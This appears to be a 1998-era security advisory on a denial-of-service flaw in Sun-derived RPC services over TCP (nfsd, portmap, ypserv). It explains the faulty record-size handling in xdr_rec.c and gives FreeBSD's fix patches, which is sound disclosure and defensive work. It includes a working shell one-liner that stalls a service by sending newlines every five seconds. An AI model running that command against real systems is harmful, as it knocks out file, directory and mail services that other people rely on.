COMMAND
RCP apps
SYSTEMS AFFECTED
Linux, FreeBSD, SunOS, System V and NeXTstep
PROBLEM
This is something Juggler found and Peter van Dijk investigated
the problem further. If you connect (using telnet, netcat,
anything) to a TCP port assigned to some RPC protocol (tested with
rpc.nfsd/mountd/portmap on Slackware 3.4/Kernel 2.0.33) and send
some 'garbage' (like a newline) every 5 seconds or faster, the
service will completely stop responding. At the very moment the
connection is closed, the service will return to normal work
again.
strace shows the following (from rpc.nfsd [nfs-server-2.2beta29]):
alarm(5) = 0
sigreturn() = ? (mask now [])
select(256, [4 5], NULL, NULL, NULL) = 1 (in [5])
accept(5, {sin_family=AF_INET, sin_port=htons(12406),
sin_addr=inet_addr("127.0.0.1")}, [16]) = 0
select(256, [0 4 5], NULL, NULL, NULL) = 1 (in [0])
select(256, [0], NULL, NULL, {35, 0}) = 1 (in [0], left {35, 0})
read(0, "\r\n", 4000) = 2
The connection is accepted, after which a new select is started
with both old file descriptors (tcp and udp listening sockets) and
the new connection. Then some data arrives on the new connection,
after which select is started with _only_ this connection as a
parameter. Then a read is started, which can only be aborted by
dropping the connection or hitting SIGALRM (which happens after 5
seconds). Right about that time, another newline is send
restarting the whole loop. This bug can easily be exploited
remotely without any special software and without taking any
noticeable bandwidth (one packet every 5 seconds). This one works
perfectly:
$ { while true ; do echo ; sleep 5 ; done } | telnet localhost 2049
Replacing the sleep 5 with sleep 6 or even more shows that the
service will then respond every once in a while. Further
examination shows that rpc.pcnfsd and rpc.ypxfrd are probably also
vulnerable, as most other RPC applications that support TCP will
be.
FreeBSD-current seems to have the problem, too (tested against
both amd and portmapper). The amd one is sort of amusing, as it
means that accesses via it will *hang* so long as the attack is in
progress. It was tested against the portmapper on SunOS 4.1.3,
with similar results.
Anything that depends on nfs to function can be shutdown
completely (temporarily, that is) with little or no effort... You
don't need maths to see that even someone with a simple 28k8
line can shutdown 100s of sites at the same time. Affected
applications include nfsd, ypserv, ypbind and portmap. Whole
networks could be brought down easily by doing this DoS on the
nfsd and/or ypserv. If the site depends on NIS for the userlists,
mail and ftp won't work during the attack.
This bug is likely present in all Sun-derived ONC RPC
implementations, including TI-RPC from ONC+, which is what you'll
find in Solaris 2.x and AIX 4.2 and up. TI-RPC uses the same XDR
record marking code, although it has an svc_vc.c module to handle
virtual circuit transports as opposed to a transport-specific
svc_tcp.c module. See 'Solution' section for more details.
SOLUTION
The bug is in Sun's RPC code. FreeBSD addressed this. The real
problem is in the XDR record marking code which is used for the
TCP transport. (In RPC 4.0, TCP is the only transport affected.
In TI-RPC, any 'virtual circuit' transport including but not
limited to TCP is affected.) The set_input_fragment() routine in
src/lib/libc/xdr/xdr_rec.c attempts to read a record header which
is supposed to specify the size of the record that follows.
Unfortunately, this routine performs no sanity checking: if you
telnet to a TCP service and send a few carriage returns,
set_input_fragment() misinterprets them as a ridiculously large
record size. This in turn causes the fill_input_buffer() routine
to try reading a ridiculously large amount of data from the
network. This is why the service stays wedged until you
disconnect. The patch FreeBSD made to fix this is as follows:
*** xdr_rec.c.orig Fri May 15 17:43:57 1998
--- xdr_rec.c Fri May 15 17:47:58 1998
***************
*** 550,555 ****
--- 550,561 ----
return (FALSE);
header = (long)ntohl(header);
rstrm->last_frag = ((header & LAST_FRAG) == 0) ? FALSE : TRUE;
+ /*
+ * Sanity check. Try not to accept wildly incorrect
+ * record sizes.
+ */
+ if ((header & (~LAST_FRAG)) > rstrm->recvsize)
+ return(FALSE);
rstrm->fbtbc = header & (~LAST_FRAG);
return (TRUE);
}
The next change relates to the svc_tcp.c module directly. The
svctcp_recv() routine calls xdr_callmsg() to attempt to decode the
RPC message header that should accompany every RPC request. With
the UDP transport, a datagram that doesn't contain a valid header
is dropped on the floor. With TCP, the connection is left open to
attempt to receive another request that may be pending. If no
valid message header is found where there should have been one,
the connection should be dropped. The following patch to
src/lib/libc/rpc/svc_tcp.c does this:
*** svc_tcp.c.orig Fri May 15 17:11:21 1998
--- svc_tcp.c Fri May 15 17:09:02 1998
***************
*** 404,409 ****
--- 404,410 ----
cd->x_id = msg->rm_xid;
return (TRUE);
}
+ cd->strm_stat = XPRT_DIED; /* XXXX */
return (FALSE);
}
This marks the transport handle as dead if xdr_callmsg() fails,
which in turn will cause the dispatcher to drop the connection.
With these patches, you have 35 seconds to supply a valid record
containing an RPC message header and request, otherwise the
session is disconnected. If you enter garbage data, the connection
is dropped immediately.